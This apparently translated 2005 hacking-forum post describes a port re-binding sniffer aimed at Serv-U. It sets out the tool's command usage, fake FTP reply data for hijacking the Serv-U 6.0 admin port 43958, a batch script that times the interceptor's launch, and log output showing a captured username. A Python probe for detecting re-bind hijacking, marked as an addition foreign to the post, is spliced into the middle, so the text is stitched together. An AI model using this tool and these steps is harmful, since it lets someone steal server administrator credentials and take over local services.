On the Serv-U Admin Password Sniffer - vulnerability warning - Black Bar Safety Net

2005-10-04T00:00:00
ID MYHACK58:6220053163
Type myhack58
Reporter Anonymous (佚名)
Modified 2005-10-04T00:00:00

Description

A long time ago FlashSky published an article on Security Focus introducing the use of dynamic port re-binding for sniffing. The principle is very simple and I will not repeat it here; anyone interested can dig the article out. My little tool is a modification of the code he gave there. The bound IP and port number are set from the command-line parameters.

The -z parameter: it binds 127.0.0.1 on the specified port, and then captures the traffic that reaches that port from the specified IP address, which must be an IP that this computer owns. This is exactly the opposite of the principle described in that article. Note: if the specified IP is 127.0.0.1 it causes a dead loop and crashes the system, at least that is what happens on my machine, sob.

The -zz parameter: it uses a loop-free interception mode. It binds the specified IP to the specified port, and when traffic reaches the specified port through that IP it uses the file given by the [FileName] parameter as the reply (echo). If several replies are needed, separate them in the file with "-Mix-".

The specific usage (this is what the program prints when the parameters are wrong):

The Codz is Based On FlashSky's , Modified By Mix . So It's Used By My Friends , Please Don't Spread !
Parameter Error
s.exe x xxx.xxx.xxx.xxx xxxxx [FileName]
[ x ---> -z || -zz || Other ]

The first case. The service on host 192.168.150.2 is bound to 127.0.0.1:
s.exe -a 192.168.150.2 21
You can sniff the traffic from 192.168.150.2 to port 21; here -a cannot be replaced by other commands.

The second case. The service on host 192.168.150.2 is bound to 192.168.150.2:
s.exe -z 192.168.150.2 21
You can sniff the traffic from 127.0.0.1 to port 21. Honestly this feels rather useless, but it is a small function anyway, so I added it.

The third case. Interception in loop-free mode:
a. The service on the host is bound to 127.0.0.1:
s.exe -zz 127.0.0.1 21 1.txt
When you connect with nc -vv 127.0.0.1 21 it displays the "first echo data" from 1.txt; after you send data once it echoes back the "second echo data" from 1.txt, and so on. When the connection is closed and a new connection comes in, s.exe exits automatically and hands the right to receive data back to the original service.
b. The service on the host is bound to 192.168.150.2:
s.exe -zz 192.168.150.2 21 1.txt
When you connect with nc -vv 192.168.150.2 21 it displays the "first echo data" from 1.txt; after you send data once it echoes back the "second echo data" from 1.txt, and so on. When the connection is closed and a new connection comes in, s.exe exits automatically and hands the right to receive data back to the original service.

The contents of 1.txt are:
-------- cut here--------
The first echo data
-Mix-
The second echo data
-Mix-
-------- cut here--------
You can give as many replies as you need, separated by "-Mix-".

Only the first and the third case have been tested. All data the visitor sends is recorded; the data the server returns is not recorded. The log file is log.log in the same directory as the program. The second case has not been debugged yet. Actually, if you do not want parameters, you could build them into the program and use a separate configuration program to set them; unfortunately I am too lazy right now! Ha ha, forgive me.
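The page's tool depends on a second local socket being allowed to bind a port that a service already listens on. The following added example (not part of the original post or of the tool) is a defender-side probe: it opens a wildcard listener on an ephemeral port and then tries the specific-address bind the tool would perform, reporting whether the operating system permitted it. The `exclusive` flag applies the Windows hardening option `SO_EXCLUSIVEADDRUSE` where the `socket` module provides it; on POSIX systems the option does not exist and the kernel already refuses the second bind.

```python
import socket


def probe_rebind(listen_host="0.0.0.0", rebind_host="127.0.0.1", exclusive=True):
    """Start a listener on listen_host:<ephemeral port>, then try to bind a
    second socket to rebind_host on the same port, without SO_REUSEADDR.

    Returns (port, hijackable). hijackable is True when the second bind
    succeeds, meaning another local process could divert connections that
    arrive for rebind_host (the situation the sniffer above exploits).
    """
    victim = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Windows services should set SO_EXCLUSIVEADDRUSE before bind(): it
        # refuses any later bind on the same port, whatever address it names.
        # The constant is only defined on Windows builds of Python.
        if exclusive and hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
            victim.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
        victim.bind((listen_host, 0))  # port 0: let the OS pick a free port
        victim.listen(1)
        port = victim.getsockname()[1]

        second = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            second.bind((rebind_host, port))
            return port, True   # the service's port could be taken over
        except OSError:
            return port, False  # bind refused (EADDRINUSE or similar)
        finally:
            second.close()
    finally:
        victim.close()


if __name__ == "__main__":
    for exclusive in (True, False):
        port, hijackable = probe_rebind(exclusive=exclusive)
        print(f"port {port}: exclusive={exclusive} -> hijackable={hijackable}")
```

On Windows, running it with exclusive=False reproduces the condition the tool relies on, while exclusive=True shows the fix a service author can apply.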

---------------------------Added 2005.01.10---------------------------
Tested in practice: the -a parameter can record the Serv-U 5.0 username and password, but if the client actively forces a disconnect and then reconnects, the program quits automatically.

---------------------------Added 2005.01.23---------------------------
Modified the third case a bit: using loop-free interception and specifying special reply data, it can intercept the Serv-U 6.0 communication on port 127.0.0.1:43958. The reply data is set as follows:
-------- cut here--------
220 Serv-U FTP Server v6.0 for WinSock ready...
-Mix-
331 User name okay, need password.
-Mix-
230 User logged in, proceed.
-Mix-
-------- cut here--------
The more depressing thing, however, is that when Serv-U 6.0 starts, ServUAdmin.exe tries to connect to management port 43958 and may ask ServUDaemon.exe to re-bind the port, so a port interception program that was started first loses its effect because of this. The interception program therefore has to be called exactly when ServUAdmin.exe starts, so that during the window between the re-bind of the port and the connection to it the interception program is running and regains control of management port 43958. This can be achieved by modifying that boring multi-threaded IP port scan BAT batch file I published; you can also use pskill or other programs to make the batch result more reliable. I have tested it successfully myself. In addition, a correction to "if the client actively forces a disconnect and then reconnects, the program quits automatically": the program now also exits when the client forcibly disconnects.

================================
Nothing much changed:

Set ip=1
echo...... Start to Scan......
:Main
netstat -an|find /C "%1" >temp.temp
FOR /F "eol=; tokens=1,3* delims=," %%i in (temp.temp) do IF /I %%i GEQ %3 del temp.temp&&goto ScanMain
goto Main
:ScanMain
echo %1%ip%:%2
start "5 of 5 8 of 8" /MIN s -zz 127.0.0.1 43958 d:\1.txt
Set /A ip=%ip%+1
if %ip% GEQ 40 goto Exit
goto ScanMain
:Exit
echo...... Scan has OK!......
set ip=

Usage: 1.bat 43958 43958 3
Here 3 is the count from netstat -an|find /C "43958" plus 1. However, this can only sniff the password the program logs in with automatically; if the password has been changed, a prompt pops up. It seems to be just a sniff.

------ Start The Log------
(the line above is repeated many times)
USER LocalAdministrator
------ Start The Log------
(repeated again many times)

Only the username was sniffed. The batch file works by constantly checking the port count and starting the sniffer when the number changes, which feels like it uses too many resources. If there is a better method, please post it.